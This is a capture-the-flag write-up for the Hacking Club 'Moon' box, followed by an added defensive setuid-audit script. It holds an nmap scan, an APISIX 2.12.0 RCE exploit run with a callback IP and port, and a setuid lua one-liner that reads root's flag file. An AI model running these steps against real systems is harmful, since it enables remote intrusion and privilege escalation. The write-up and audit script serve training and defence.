Moon Writeup
Author: Gabriel Silva (@gabriel-silva-509347165)
Platform: Hacking Club
Difficulty: Easy
Name: Moon
Port Scanning
nmap -sV -sC -p- -v $IP --open
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c1:fe:c0:85:79:2c:77:d0:06:04:93:1e:b7:5b:55:df (RSA)
| 256 b4:96:88:93:3b:59:e2:ea:11:ae:c9:69:78:9c:a4:6c (ECDSA)
|_ 256 1e:75:3d:55:78:74:36:aa:d1:9e:94:09:70:f5:68:90 (ED25519)
2379/tcp open etcd-client?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Access-Control-Allow-Headers: accept, content-type, authorization
| Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
| Access-Control-Allow-Origin: *
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Fri, 19 Jul 2024 05:15:54 GMT
| Content-Length: 19
| page not found
| GetRequest:
| HTTP/1.0 404 Not Found
| Access-Control-Allow-Headers: accept, content-type, authorization
| Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
| Access-Control-Allow-Origin: *
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Fri, 19 Jul 2024 05:15:26 GMT
| Content-Length: 19
| page not found
| HTTPOptions:
| HTTP/1.0 200 OK
| Access-Control-Allow-Headers: accept, content-type, authorization
| Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
| Access-Control-Allow-Origin: *
| Date: Fri, 19 Jul 2024 05:15:27 GMT
| Content-Length: 0
| docker:
| HTTP/1.1 400 Bad Request: missing required Host header
| Content-Type: text/plain; charset=utf-8
| Connection: close
|_ Request: missing required Host header
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: no-cache
| Content-Type: text/html; charset=UTF-8
| Expires: -1
| Pragma: no-cache
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Fri, 19 Jul 2024 05:15:26 GMT
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <script>
| !(function() {
| ('PerformanceLongTaskTiming' in window) {
| (window.__tti = { e: [] });
| PerformanceObserver(function(l) {
| g.e.concat(l.getEntries());
| g.o.observe({ entryTypes: ['longtask'] });
| })();
| </script>
| <meta charset="utf-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
| <meta name="viewport" content="width=device-width" />
| <meta name="theme-color" content="#000" />
| <title>Grafana</title>
| <base href="/" />
| <link
| rel="preload"
| href=
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=UTF-8
| Expires: -1
| Pragma: no-cache
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Fri, 19 Jul 2024 05:15:32 GMT
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <script>
| !(function() {
| ('PerformanceLongTaskTiming' in window) {
| (window.__tti = { e: [] });
| PerformanceObserver(function(l) {
| g.e.concat(l.getEntries());
| g.o.observe({ entryTypes: ['longtask'] });
| })();
| </script>
| <meta charset="utf-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
| <meta name="viewport" content="width=device-width" />
| <meta name="theme-color" content="#000" />
| <title>Grafana</title>
| <base href="/" />
| <link
|_ rel="preload"
9000/tcp open tcpwrapped
9080/tcp open http OpenResty web app server
|_http-server-header: APISIX/2.12.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9081/tcp open http nginx 1.19.0
|_http-favicon: Unknown favicon MD5: EBC398A521A820550E20D38221AE717E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.19.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9082/tcp open http nginx 1.19.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: A60BE5F4B4EF66A4AF5000B66067DADE
|_http-server-header: nginx/1.19.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9090/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-favicon: Unknown favicon MD5: 5EE43B38986A144D6B5022EA8C8F748F
| http-methods:
|_ Supported Methods: GET OPTIONS
| http-title: Prometheus Time Series Collection and Processing Server
|_Requested resource was /graph
9091/tcp open http OpenResty web app server
|_http-server-header: openresty
|_http-title: 404 Not Found
9443/tcp open ssl/tungsten-https?
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap found ports 22 (SSH), 2379, 3000, 9000, 9080 (HTTP), 9081 (HTTP), 9091 (HTTP) and 9443 (HTTPS) open.
Enumeration
To keep the writeup short, we go straight to the port that matters: 9080 (APISIX).
Apache APISIX is a high-performance, dynamic, real-time API gateway. It offers advanced traffic management features such as load balancing, dynamic upstreams, canary releases, circuit breaking, authentication and more.
We can confirm the APISIX version by banner grabbing with curl (nmap also reported the version).
curl -I http://172.16.4.86:9080
This version, APISIX/2.12.0, is vulnerable to RCE (Remote Code Execution).
searchsploit APISIX
Foothold
python3 50829.py http://172.16.4.89:9080/ 10.0.31.150 1337
Privilege Escalation
SUID /usr/bin/lua
find / -perm -u=s -type f 2>/dev/null
https://gtfobins.github.io/gtfobins/lua/#suid
lua -e 'local f=io.open("/root/root.txt", "rb"); print(f:read("*a")); io.close(f);'
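The setuid lua binary is the whole privilege escalation here, so the defender-side counterpart is an audit that runs the same find command and flags interpreters carrying the setuid bit, plus anything not on a known-good baseline. This is an added example, not part of the original writeup; the watchlist is one I assembled and the baseline path is hypothetical.

```shell
#!/bin/sh
# Audit setuid binaries found with the writeup's `find` command and flag the
# ones a low-privileged user could turn into a root shell (interpreters such
# as lua). Added example; watchlist and baseline path are assumptions.

# Interpreters and tools that should never carry the setuid bit
# (hypothetical watchlist assembled for this example).
RISKY_SUID="lua lua5.1 lua5.3 lua5.4 python python2 python3 perl ruby php node nmap vim vi find bash sh"

# Read setuid paths on stdin; print those whose basename is on the watchlist.
flag_risky_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        base=${path##*/}
        for risky in $RISKY_SUID; do
            if [ "$base" = "$risky" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Read setuid paths on stdin; print those absent from a baseline file
# (one expected path per line), so newly added setuid files stand out.
diff_suid_baseline() {
    baseline=$1
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        grep -qxF -- "$path" "$baseline" || printf '%s\n' "$path"
    done
}

# Live run: same find command as the writeup, then both checks.
# Remediation for each flagged interpreter is `chmod u-s <path>`.
audit_suid() {
    baseline=${1:-/etc/suid.baseline}   # hypothetical baseline location
    now=$(mktemp)
    find / -perm -u=s -type f 2>/dev/null > "$now"
    echo "[*] setuid interpreters (fix with: chmod u-s <path>):"
    flag_risky_suid < "$now"
    if [ -f "$baseline" ]; then
        echo "[*] setuid files not in baseline $baseline:"
        diff_suid_baseline "$baseline" < "$now"
    fi
    rm -f "$now"
}

# Only scan the live system when explicitly requested (SUID_AUDIT_RUN=1).
if [ "${SUID_AUDIT_RUN:-0}" = 1 ]; then
    audit_suid "$@"
fi
```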